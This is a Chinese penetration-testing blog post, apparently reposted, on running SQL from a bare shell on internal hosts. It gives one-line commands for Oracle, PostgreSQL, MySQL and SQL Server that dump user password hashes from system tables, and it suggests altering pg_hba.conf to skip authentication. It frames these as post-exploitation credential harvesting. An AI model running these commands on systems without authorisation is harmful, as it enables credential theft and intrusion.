聲明:????文章初衷僅為攻防研究學習交流之用，嚴禁利用相關技術去從事一切未經合法授權的入侵攻擊破壞活動，因此所產生的一切不良后果與本文作者及該公眾號無任何關聯????另外，這只是一個個人性質的公眾號(非任何商業營銷號)，目的也僅為技術分享交流，并不想去招惹任何是非，故，除了此公眾號，將不再考慮做其他的任何推廣 ( 細心的你可能也發現了，至今為止，甚至連一則外部廣告都不曾出現過 )，再次聲明，嚴禁所有未經本人明確授權的惡意轉載 及 非法營銷牟利行為

實戰場景說明:

????實戰中，可能經常會遇到類似這樣的問題，比如，內網機脫網，無法進行各種正反向代理轉發(或者速度極慢，根本連不上)，導致Navicat，SSMS，PLSQL...等各種三方數據庫客戶端根本無使用條件，再比如，無rdp操作條件，只有一個cmdshell / bash， 但最終目的也只是想在庫中快速進行一些賬號密碼搜集或者脫取庫表結構類的簡單操作，等等諸如此類吧...

????此時，就需要了解關于各主流數據庫在cmd/bash下的一些非交付sql執行方式，非常簡單，沒任何技術含量，只為筆記留存，方便其它弟兄們，注，如下的所有工具均為各自數據庫內置工具，不依賴任何第三方外部工具( 即使數據庫沒裝亦把對應的命令行客戶端拆出來獨立使用 )，很靈活

0x01 Oracle

安裝用戶權限下，無密碼非交互執行

tv.sql 語句select * from v$version;SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';SELECT name,spare4 FROM sys.user$;exit;默認在裝好oracle以后,sqlplus會被自動寫到當前用戶的環境下,直接執行即可# echo SELECT name,spare4 FROM sys.user$; | sqlplus "/ as sysdba"# sqlplus "/ as sysdba" @c:\tv.sql > c:\Users\public\simlog.logs

0x02 Postgresql

????服務安裝用戶權限下,無密碼非交互執行，修改目標服務配置文件(pg_hba.conf)，對127.0.0.1進行trust，之后再想辦法覆蓋目標原有配置文件[Win下比較特殊，無需重啟服務，即時生效]

tv.sql語句select version();SELECT usename FROM pg_user WHERE usesuper IS TRUE;SELECT usename, passwd FROM pg_shadow;PgSQL在裝好之后,默認并沒有把PSQL沒寫到當前用戶環境變量下,故需要自行指定絕對路徑執行# echo SELECT usename, passwd FROM pg_shadow; | C:\SRV\PgSQL9.4.24\bin\psql -h 127.0.0.1 -p 5432 -U postgres# C:\SRV\PgSQL9.4.24\bin\psql -h 127.0.0.1 -p 5432 -U postgres < c:\tv.sql

0x03 Mysql 帶賬密非交互執行

tv.sql 語句select @@version;select user,host,password from mysql.user;一般情況下,在安裝Mysql時都會順手把環境變量選項勾上,故直接執行即可,如遇未添加環境變量,找到目標mysql安裝目錄下的bin目錄指定絕對路徑執行即可# mysql -uroot -p"abc123" -D Mysql # mysql -uroot -p"abc123" -D Mysql -e "select user,host,password from mysql.user\G;select version()\G;";

0x04 SqlServer 帶賬密非交互執行

tv.sql 語句select @@version;SELECT name, password_hash FROM master.sys.sql_logins;Mssql安裝完后,默認都會把sqlcmd添加到當前用戶環境變量下,故直接執行即可# sqlcmd -U sa -P pwd123 -S 192.168.159.131 -d master -i "C:\tv.sql"#?sqlcmd?-U?sa?-P?pwd123?-S?192.168.159.131?-d?master?-Q?"?SELECT?name,?password_hash?FROM?master.sys.sql_logins;"

小結:

????非常簡單，不再贅述，其實有些工具稍微靈活配合bat/sh，轉身一變就是個服務噴射工具，非常適用于某些特殊場景下，還是那初衷，一篇文章只解決一個小問題，不想摻雜太多廢話，祝好運

????如果覺得確實還不錯，也歡迎積極轉發留言，以便讓更多真正需要的人都能看到，如遇到文中錯誤，也歡迎隨時私信指正，非常感謝?

????另外，也非常期待能和更多真正志同道合弟兄一起深入交流學習，( 還是那句話，維護不易，亂七八糟的人就不要來了，非常感謝 )

總結

以上是生活随笔為你收集整理的shell sqlplus执行sql文_各主流数据库非交互执行的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。